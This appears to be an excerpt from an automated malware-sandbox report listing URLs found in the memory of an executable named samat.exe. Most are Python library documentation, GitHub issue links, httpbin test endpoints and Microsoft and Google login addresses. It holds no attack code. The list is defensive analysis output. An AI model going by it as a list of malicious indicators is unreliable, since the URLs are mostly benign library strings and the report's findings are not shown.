                    Source: samat.exe, 00000008.00000003.4503586193.000001BCCC093000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513113910.000001BCCC0B6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3016877538.000001BCCC3E4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509147637.000001BCCC094000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512873377.000001BCCC09D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499785539.000001BCCC06D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502296671.000001BCCC070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
                    Source: samat.exe, 00000008.00000002.4556112760.000001BCCC200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBD90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                    Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.metadata.html
                    Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/multiprocessing.html
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/reference/import.html#finders-and-loaders
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
                    Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526120054.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531854842.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561049803.000001BCCCA70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Ousret/charset_normalizer
                    Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astral-sh/ruff
                    Source: samat.exe, 00000008.00000002.4561955068.000001BCCCD00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
                    Source: samat.exe, samat.exe, 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmp, samat.exe, 00000008.00000002.4572895965.00007FF8B7ECF000.00000002.00000001.01000000.00000031.sdmpString found in binary or memory: https://github.com/mhammond/pywin32
                    Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/platformdirs/platformdirs
                    Source: samat.exe, 00000008.00000002.4565219957.000001BCCDA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/psf/requests/pull/6710
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packaging
                    Source: samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/packagingp
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/1024.
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/417#issuecomment-392298401
                    Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml
                    Source: samat.exe, 00000008.00000002.4562069346.000001BCCCE00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/setuptools/issues/new?template=distutils-deprecation.yml0
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel
                    Source: samat.exe, 00000007.00000003.2998761244.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pypa/wheel/issues
                    Source: samat.exe, 00000008.00000002.4554006263.000001BCCBE14000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                    Source: samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de1
                    Source: samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de11z
                    Source: samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                    Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549329802.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4542418426.000001BCCBFFB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554983007.000001BCCC000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                    Source: samat.exe, 00000008.00000003.3021175651.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018678721.000001BCCC7CF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526403156.000001BCCC46C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507302414.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504313591.000001BCCC469000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3018744804.000001BCCC468000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502404142.000001BCCC466000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518851615.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4512558074.000001BCCC46A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020091541.000001BCCC468000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/issues
                    Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
                    Source: samat.exe, 00000008.00000003.4551504232.000001BCCBFD3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3003212092.000001BCCBFFF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554707107.000001BCCBFD4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551021868.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538014733.000001BCCBFCE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4504500710.000001BCCBFDD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4554916521.000001BCCBFF8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505052664.000001BCCBFF5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4541657375.000001BCCBFD2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4535536595.000001BCCBFC2000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3007180110.000001BCCBFDC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514197037.000001BCCBFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560489792.000001BCCC97E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/292002
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
                    Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/32902
                    Source: samat.exe, 00000008.00000003.4511515721.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4519148634.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4524896627.000001BCCCA6D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500760862.000001BCCCA6C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                    Source: samat.exe, 00000008.00000003.4523890696.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531671427.000001BCCC99A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513181603.000001BCCC7E8000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4507086114.000001BCCC7C0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523746156.000001BCCC7E9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4502168541.000001BCCC995000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                    Source: samat.exe, 00000008.00000002.4559133719.000001BCCC7F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
                    Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                    Source: samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
                    Source: samat.exe, 00000008.00000003.4501044998.000001BCCC465000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508966927.000001BCCC48A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4521773400.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4498534466.000001BCCC431000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4549013066.000001BCCC8AA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4511944713.000001BCCC492000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4538378339.000001BCCCAA1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                    Source: samat.exe, 00000008.00000002.4559686522.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517974970.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527003356.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/post
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/badge/skeleton-2024-informational
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/charliermarsh/ruff/main/assets
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/pyversions/importlib_metadata.svg
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/importlib_metadata.svg
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/
                    Source: samat.exe, 00000007.00000003.2997644461.00000209A43F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://importlib-metadata.readthedocs.io/en/latest/?badge=latest
                    Source: samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                    Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                    Source: samat.exe, 00000008.00000003.3023133248.000001BCCC89F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3023133248.000001BCCC835000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527191112.000001BCCC8B7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mahler:8092/site-updates.py
                    Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531201836.000001BCCD413000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532208300.000001BCCD415000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdf
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.
                    Source: samat.exe, 00000008.00000002.4562310783.000001BCCD010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadata
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/entry-points/#file-format
                    Source: samat.exe, 00000008.00000003.4500627948.000001BCCC7F0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532440818.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530927299.000001BCCC7FD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC7BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559196622.000001BCCC7FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the
                    Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516814567.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529818458.000001BCCC96F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4551562745.000001BCCC972000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560430089.000001BCCC973000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526822123.000001BCCC96E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-file
                    Source: samat.exe, 00000008.00000002.4562192857.000001BCCCF10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
